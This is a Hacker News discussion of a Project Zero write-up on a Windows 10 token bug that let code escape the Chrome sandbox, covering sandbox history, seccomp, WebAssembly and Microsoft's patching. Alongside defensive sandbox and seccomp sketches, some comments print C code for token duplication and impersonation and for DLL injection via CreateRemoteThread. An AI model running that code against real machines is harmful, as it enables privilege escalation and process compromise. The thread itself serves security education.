What a one line change did to the Chrome sandbox (googleprojectzero.blogspot.com)
160 points by jbredeche on April 23, 2020 | 62 comments


> The Chromium sandbox on Windows has stood the test of time. It’s considered one of the better sandboxing mechanisms deployed at scale without requiring elevated privileges to function.

For anyone who is interested in the history, this type of Restricted Token & Job Object sandbox was, as far as I know, first used in MOICE (Microsoft Office Isolated Conversion Environment). This was created by Microsoft's Office Trustworthy Computing group to isolate the conversion of `.doc` to `.docx`. David LeBlanc blogged about it in 2007, with his "Practical Windows Sandboxing" series[0][1][2]. Of course a third party may have independently discovered the same techniques but kept them to themselves.

The state of the art has improved since then but the general principles are the same.

[0]: https://docs.microsoft.com/en-us/archive/blogs/david_leblanc...

[1]: https://docs.microsoft.com/en-us/archive/blogs/david_leblanc...

[2]: https://docs.microsoft.com/en-us/archive/blogs/david_leblanc...
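For anyone curious what that pattern looks like in code, here is a minimal sketch of restricted-token-plus-job-object sandboxing (error handling omitted; the converter path and the specific job limits are illustrative, not what MOICE or Chromium actually use):

  #include <windows.h>

  // Minimal sketch of the restricted-token-plus-job-object pattern.
  // Real sandboxes (MOICE, Chromium) also lower the integrity level,
  // use an alternate desktop, and disable specific group SIDs.
  int wmain(void) {
    HANDLE process_token = NULL, restricted_token = NULL;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &process_token);

    // DISABLE_MAX_PRIVILEGE strips every privilege except SeChangeNotify.
    CreateRestrictedToken(process_token, DISABLE_MAX_PRIVILEGE,
                          0, NULL,   // SIDs to disable
                          0, NULL,   // privileges to delete
                          0, NULL,   // restricting SIDs
                          &restricted_token);

    // The job object caps what the child can do even after compromise.
    HANDLE job = CreateJobObjectW(NULL, NULL);
    JOBOBJECT_BASIC_LIMIT_INFORMATION limits = {0};
    limits.LimitFlags = JOB_OBJECT_LIMIT_ACTIVE_PROCESS;
    limits.ActiveProcessLimit = 1;   // the child can't spawn more processes
    SetInformationJobObject(job, JobObjectBasicLimitInformation,
                            &limits, sizeof(limits));

    // Start suspended so the child is in the job before it runs any code.
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi = {0};
    CreateProcessAsUserW(restricted_token,
                         L"C:\\example\\converter.exe",  // hypothetical target
                         NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,
                         NULL, NULL, &si, &pi);
    AssignProcessToJobObject(job, pi.hProcess);
    ResumeThread(pi.hThread);
    return 0;
  }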


I believe some chromium sandbox logic came from GreenBorder (https://en.m.wikipedia.org/wiki/GreenBorder) but I don't know the timeline of that or how GreenBorder sandboxing was implemented.


Are there any antivirus vendors which now use these techniques? I know there was a spat between a member of the Chrome team and antivirus vendors about the latter not using sandboxes.


I wish so much there were good cross-operating-system sandboxing techniques. So many problems in things like video decoders (which are hard to write fast and safe) would be cured if I could easily pop them in a box with an input and output stream.

Browsers of course have this type of stuff, and they are doing great work in this area; it is just a shame that it is hard for the rest of us to use.


WebAssembly looks like an upcoming standard for sandboxing efficient code on the server side as well. As it's well supported and doesn't have a big startup/runtime cost, it has a real chance of success right now (after many failed attempts in the last 25 years).


WebAssembly has a substantial performance hit for code containing hand-written vector loops using specialized instructions.

Things like video encoders and decoders are much slower in WebAssembly.


SIMD support is being worked on as far as I know, and this is an area with room for a lot of improvement in the future. Generally, interfacing between programming languages and systems efficiently, without too much data conversion and memory-management overhead, is a harder problem than adding more low-level programming support.


Yes, it looks like WASM SIMD has already shipped in V8. There are some impressive demos on this page: https://v8.dev/features/simd


It's kinda lame that none of those demos even run at 60fps, let alone 120fps on mobile for a real smooth experience, with lots of performance headroom for more than a single feature at once...


I don't think SIMD support will help here; a lot of the encoder/decoder code base is hand-written ASM.


There's no reason to think it won't help - the encoder/decoder code base could be written in WASM directly to ensure it uses the SIMD instructions, and those will hopefully map closely to the machine SIMD instructions.

Of course though, you're right that it'll still incur a performance penalty.
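As a rough illustration, clang/Emscripten already expose the WASM SIMD proposal as C intrinsics via wasm_simd128.h, so a hand-vectorized kernel can be written directly against it (a toy example, not real codec code):

  #include <wasm_simd128.h>

  // dst[i] += src[i] * k, four floats per iteration, 128-bit WASM SIMD.
  // Build with: emcc -O2 -msimd128 kernel.c
  void scale_add(float *dst, const float *src, float k, int n) {
    v128_t vk = wasm_f32x4_splat(k);
    int i = 0;
    for (; i + 4 <= n; i += 4) {
      v128_t s = wasm_v128_load(src + i);
      v128_t d = wasm_v128_load(dst + i);
      wasm_v128_store(dst + i, wasm_f32x4_add(d, wasm_f32x4_mul(s, vk)));
    }
    for (; i < n; i++)          // scalar tail for leftover elements
      dst[i] += src[i] * k;
  }

How closely those intrinsics map to the machine's native SIMD instructions is up to the engine, which is exactly where the remaining performance penalty comes from.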


Someone needs to make a dev environment where a developer can write WASM and see, in real time, the generated assembly instructions, together with the number of cycles to execute.

That way, the developer can tweak the input to the compiler to get exactly the sequence of instructions they wanted.

They can also hand-write the output assembly, and submit a patch to the compiler saying "this generated assembly is faster than what you generated, so please generate this in the next version".


Sounds like a good margin to focus on for a... patent? What would IP in this space be?


Wouldn't patenting a performance optimization just work to prevent all browsers from adopting it?


Personally I find that hard to believe until it gets some mechanism of actually being able to free memory back to the OS.


Wasm is too slow, and it is not different from other techniques that compile to an IR.

It does not stop all kinds of issues, so it is not secure on its own either.


Could "fast" VMs be a solution? e.g. Firecracker. You get a fairly robust level of isolation that way and they're quick to start.


VMs feel a bit heavy, even if they are fast. If I want to wrap multiple parts of a program, I could end up spawning a dozen VMs...


Not sure how relevant it is but Deno will be sandboxed by default (no disk/net access). So you could pipe in video and it could pipe out the encoded/decoded version with no access to disk.


This is one reason I much prefer Linux’s seccomp over Microsoft’s sandbox. Microsoft’s depends on everything having just the right access control so you can’t escape. Linux’s blocks the dangerous primitives entirely.

A seccomp-like mechanism on top of restricted tokens could be quite strong. The GPU process could be denied the ability to query or modify processes entirely. Similarly, it could be denied the ability to call CreateProcessAsUser at all.
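For comparison, here is a hypothetical libseccomp policy sketching the "block the dangerous primitive entirely" approach (not Chromium's actual filter; Chromium's Linux sandbox uses its own seccomp-bpf policies per process type):

  #include <errno.h>
  #include <seccomp.h>   // libseccomp; link with -lseccomp

  // Whatever the ACLs say, these syscalls now simply fail with EPERM.
  // Hypothetical policy for a GPU-style process.
  int apply_filter(void) {
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);  // default: allow
    if (ctx == NULL)
      return -1;
    seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(ptrace), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(execve), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(process_vm_writev), 0);
    int rc = seccomp_load(ctx);   // install for this process and its children
    seccomp_release(ctx);
    return rc;
  }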


I think an analogy is trying to get a complicated IAM permissions setup just right, where you have some resource policies with NotPrincipal, some usage policies with NotResource/NotAction, etc. It becomes really hard to think about and you often rely on assumptions about the shape/structure of IAM principals.

Or, you can slap a Service Control Policy on the whole account and then boom, nobody can do Whichever Bad Thing that you're worried about Today.

The former approach requires me to reload the entire graph of dependencies and assumptions into my head whenever I want to make a change or ask my mental model of it a question. The latter approach allows nearly-reflexive answers.


This is very closely related to how seL4 [0] allows delegating (subsets of) a process's own capabilities. The difference is that this Windows kernel code isn't formally verified to uphold its security model to the level where send-only capabilities are proven data diodes (i.e., the seL4_Send() syscall blocks, potentially indefinitely, and its non-blocking counterpart seL4_NBSend() silently drops the message, without a success/failure indication, if the receiver isn't already waiting), whereas seL4 comes with extensive proofs.


Excuse my ignorance, but does this make Chrome the safest browser on Windows? Or do all Chromium-based browsers benefit from this sandboxed environment and Google's security measures?

Thx


Edge would have both all the security work of Chrome (as it's a fairly close fork) and the security improvements that Google refuses to add, such as blocking third-party tracking scripts and cookies. The latter is where you're most likely to find malware, so a browser that refuses to act on it is not a secure browser. Firefox, Safari, Edge, and basically everyone but Chrome have implemented significant blocking of third-party scripting that Google refuses to build into their browser.

Bear in mind, browser security comes from many levels. A sandbox escape first requires that someone has gotten malicious code to execute in your browser. And the first line of defense is blocking a lot of extraneous and harmful code from running in the first place.


Can you talk about what kind of malware comes from JS scripts?


Here is a detailed look at one particular example:

https://securelist.com/chrome-0-day-exploit-cve-2019-13720-u...


Not necessarily. Firefox has its own set of protections and even introduced a new language (Rust) to deal with common security vulnerabilities without sacrificing speed.

But the takeaway from this post is more that perfect safety is difficult / impossible to achieve.


Firefox runs multiple sites in a single process; its sandboxing doesn't come close.


This hasn't been true for years (https://wiki.mozilla.org/Electrolysis)


Actually, it is still true. Electrolysis split up Firefox into multiple processes, but not every site gets its own process. Work is underway to change this and achieve full site isolation in https://wiki.mozilla.org/Project_Fission.

(Disclosure: I work for Mozilla, but not on this)


Afaik, it uses Chromium's sandboxing?

That said, safety is about much more than just sandboxing.


Assuming the "customizers" haven't messed up the sandbox, any Chromium-based browser is well-protected. You can visit chrome://sandbox to see which features are enabled. If you're talking about the new Edge, I think that includes the same sandboxing as regular Chrome.


This post does not offer evidence that could either support or contradict an answer to your question.


Using the cloned UI Access token to automate the Run dialog at the end of the exploit chain is hilarious.

I really enjoyed reading this - thank you.


Could someone tell me in simple terms, please?


My understanding:

There are these security token objects that are used to keep track of what a process can and can't do. (Think of them as collections of capabilities.)

The design of the system is that you can create a less powerful child copy of your security token (dropping capabilities), and assign this token to a child process when you create that child. A process is free to change its security token to be any child of its current token or any sibling of its current token (plus a few other restrictions).

Someone screwed up a change to the Windows 10 kernel such that when the browser creates a restricted child of its token, the less powerful token is actually marked as a sibling of the browser's token, which is itself a sibling of many other tokens in the system. This means that the token the browser uses to create its child sandbox process has many unrestricted sibling tokens.

The rest of the exploit involves figuring out how to get handles to security tokens that a few other processes make publicly available (sounds very strange to me) and which aren't as restrictive as the security token used to create the sandbox process.

If the sandbox's token were (correctly) a child of the main browser process's token, then these other tokens found wouldn't be siblings of the sandbox's token, and the sandbox process couldn't switch to using these security tokens. However, because of the screwed up family tree of these tokens, the sandbox is free to switch to these other security tokens.
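To make that concrete, the primitive the bug effectively hands a sandboxed process looks roughly like the sketch below (not the post's actual exploit, which also has to find openable tokens and work around mitigations):

  #include <windows.h>

  // From inside the sandbox: duplicate another process's token and
  // impersonate it. Normally the kernel's parent/child relationship check
  // on tokens would refuse this; the one-line change broke that check.
  BOOL borrow_token(DWORD victim_pid) {
    HANDLE proc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION,
                              FALSE, victim_pid);
    if (proc == NULL)
      return FALSE;

    HANDLE token = NULL;
    if (!OpenProcessToken(proc, TOKEN_DUPLICATE, &token))
      return FALSE;

    // Make an impersonation-level copy of the victim's token.
    HANDLE imp_token = NULL;
    if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL,
                          SecurityImpersonation, TokenImpersonation,
                          &imp_token))
      return FALSE;

    // The calling thread now runs under the less restricted token.
    return SetThreadToken(NULL, imp_token);
  }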


This was very clearly written, thank you.


Windows has an incredibly complicated set of token-based authentication mechanisms that Chrome relies on. They interact with each other in non-trivial ways and were introduced piecemeal over a few decades.

It is so complicated that even the people maintaining it don’t understand it, and they accidentally added a privilege escalation path.

The author uses that privilege escalation path to escape from the Chrome sandbox.

The real WTF is the complexity and obscurity of the security primitives being exported from the kernel. Arguably, all major operating systems have the same issue, and are getting worse over time — I doubt anyone understands all of the layers of privilege checking mechanisms that have been bolted on to Linux, Windows or Mac OS over the years.


This. The problem is that it is fairly easy to add another layer of protection, but nearly impossible to remove or replace it later.


From my understanding, someone at Microsoft changed a line of code related to access control in Windows, and it broke some access-control guarantees. The author thinks the change was a mistake, perhaps code cleanup by a Microsoft employee.

Then it's a long, detailed post about how you can exploit the bug, while leaving out some critical parts so you can't actually exploit it for real.


I'm not sure which critical parts I've left out unless you mean a full working POC? The fun is reimplementing :-)


Well, thanks for not publishing a full working POC.

About the critical missing part, I was thinking about this:

> Let’s focus on escaping the GPU process sandbox. As I don’t have a GPU RCE to hand I’ll just inject a DLL into the process to run the escape.

From what I understand, a GPU RCE would allow escaping the sandbox remotely, while injecting the DLL requires good control of the machine already. But your post was not about a GPU RCE, so it totally makes sense not to do it. I may be very wrong because I am not a security expert; I only read MISC (a French magazine about security) on the beach.


Ah, I see what you mean :-) Well, yes, I left out the RCE as I'm not an RCE person; I look for sandbox escapes and privilege escalation bugs. The injection of a DLL is to test, rather than as an exploit.

I was originally going to write about using the same bug in Firefox. The default content sandbox in FF is basically the same as Chrome GPU, so any untrusted HTML/JS coming from the web could exploit RCE to get into a sandboxed process where this bug could be used. I decided that, considering they're using the Chromium sandbox code, it really should be about Chrome.

That said, this sandbox escape isn't being presented as a practical attack. It'd be incredibly noisy to do, and potentially unreliable due to the various mitigations you have to circumvent. Any "real" attacker would likely use an exploit in the kernel's WIN32K component, which is accessible from the GPU process.


Has it been fixed in Firefox?


The vulnerability is in Windows 10. Windows 10 has been fixed. It's not clear in the article what other mitigations are in place in Firefox to make exploitation more difficult.


Basically my PoC works exactly the same from Chrome GPU as from FF Content Level 5 [1]; there was no additional hardening. It was also easier to test, as FF doesn't enable the Microsoft DLL signing mitigation, so I could just do a direct CreateRemoteThread -> LoadLibrary without messing with KnownDlls.

[1] https://wiki.mozilla.org/Security/Sandbox
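For readers unfamiliar with the technique, the CreateRemoteThread -> LoadLibrary injection mentioned above is the textbook pattern sketched here (test-harness code that assumes you already have full control of the machine; it stands in for a real RCE and is not part of the escape itself):

  #include <windows.h>
  #include <wchar.h>

  // Write the DLL's path into the target process, then start a remote
  // thread at LoadLibraryW so the target loads the DLL itself.
  BOOL inject(DWORD pid, const wchar_t *dll_path) {
    HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (proc == NULL)
      return FALSE;

    SIZE_T size = (wcslen(dll_path) + 1) * sizeof(wchar_t);
    LPVOID remote = VirtualAllocEx(proc, NULL, size,
                                   MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    WriteProcessMemory(proc, remote, dll_path, size, NULL);

    // kernel32 is mapped at the same base in every process, so the local
    // address of LoadLibraryW is valid in the target too.
    LPTHREAD_START_ROUTINE start = (LPTHREAD_START_ROUTINE)
        GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW");
    HANDLE thread = CreateRemoteThread(proc, NULL, 0, start, remote, 0, NULL);
    return thread != NULL;
  }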


I've briefly professionally interacted with James and he's the real deal. Super smart.


Good article but James just sounds salty throughout the post


You can bet I'm salty. I do Windows research and I am an owner of the Chromium Windows sandbox code, so I have a vested interest in this.

The problem with dealing with Windows, and by extension Microsoft, is that there's no way of inspecting what they've changed from version to version other than by RE or by having test cases. We try to avoid writing unit tests for behaviors Microsoft is responsible for, but of course in many cases MS doesn't have those tests either, so these things fall through the cracks.


I have a question. With the sheer number of Windows components each having objects whose security and inheritability can be manipulated individually, and with tokens and privileges controlling access on top of that, and with so many users and groups to account for, and with so many special cases for consoles etc. to consider, I'm surprised at how few of these bugs there seem to be. It seems like a herculean feat to track everything for even just a single version of the kernel, let alone in an ever-evolving entire OS. Do you know how Microsoft keeps track of all the security barriers, interactions, etc. in the entire OS? Do they have entire teams dedicated to just tracking the security privileges/permissions/etc. for all the components?


> However, we try and avoid writing unit tests for behaviors Microsoft's responsible for,...

When you say "unit tests", this makes sense. But wouldn't it be wise to have integration tests in place that would guard against such regressions, either in your code or Microsoft's?


In Chromium we do have integration tests for the sandbox functionality as a whole, as well as unit tests, but they don't cover things like this: we're testing Chromium's ability to sandbox, not whether the OS's primitives have broken. We might notice if all of a sudden our sandbox stopped working, but for something which only exhibits a problem when it's being actively circumvented, we won't.

I can't speak to what MS do testing wise, considering the age of some of this code it seems likely there's no test for this specific functionality otherwise you'd assume it would have been noticed. Testing for security defects is inherently difficult anyway, especially logical flaws where you don't get a nice crash. This case is different but in general you usually need some specific setup process to get the system into a vulnerable state which is hard to achieve without knowing ahead of time the bug you were trying to detect.


Does anyone else feel like if Windows was still a classic OS instead of "as a service" then these types of changes would have a chance to get more scrutiny during development and hopefully get caught?


Since they supported multiple versions at once, important bugfixes were backported, but risky new features were not. For a year or so after each release, the previous release was more stable. This let the customer choose between security/stability and new features.

I think it’s a great model, but it breaks down when the new version is a feature/usability regression vs the old version.

Once that started happening more often than not, the “aas” models came out, where the vendors started force upgrading users instead of trying to compete with version N-1.

This is worse for the users, but better for deadline-focused middle management, so it’s become incredibly popular.


Are you saying that these sort of changes were never part of a patch or service-pack before Win10?


Do you think it's sensible for me to make such a claim?


No, but that's what it sounded like you were doing.


Nah. It would have just taken longer to fix, imho.


This. Twenty years ago, if you reported a bug to MS, and they agreed it was a bug, and they agreed to fix it, then you might actually have working code in three years' time when the next version of Windows was released. Five years after that, all of your customers might have upgraded to this new version of Windows. And then you could rely on the fix.

Important customers could get a hotfix. For anyone else reporting bugs was pointless.


In its consumer operating systems, MS used to not consider it a bug for a process to exploit other processes on the same machine. After all, why would you be running untrusted code?

I'd also add that Microsoft used to be notoriously bad at security, such that even Mac owners would make fun of them. We're still dealing with the design decisions made during that era. It's only since XP SP1 that security was taken more seriously and it wasn't until Vista that they truly started to grapple with the whole mess from the ground up.


> even Mac owners would make fun of them

Although, in reality, Mac owners were really only secure by way of being too few and far between to bother writing malware for.

Just this past year, Apple essentially implemented UAC in OS X.


Hasn't Mac software run with non-admin user permissions by default since the first version of OS X?



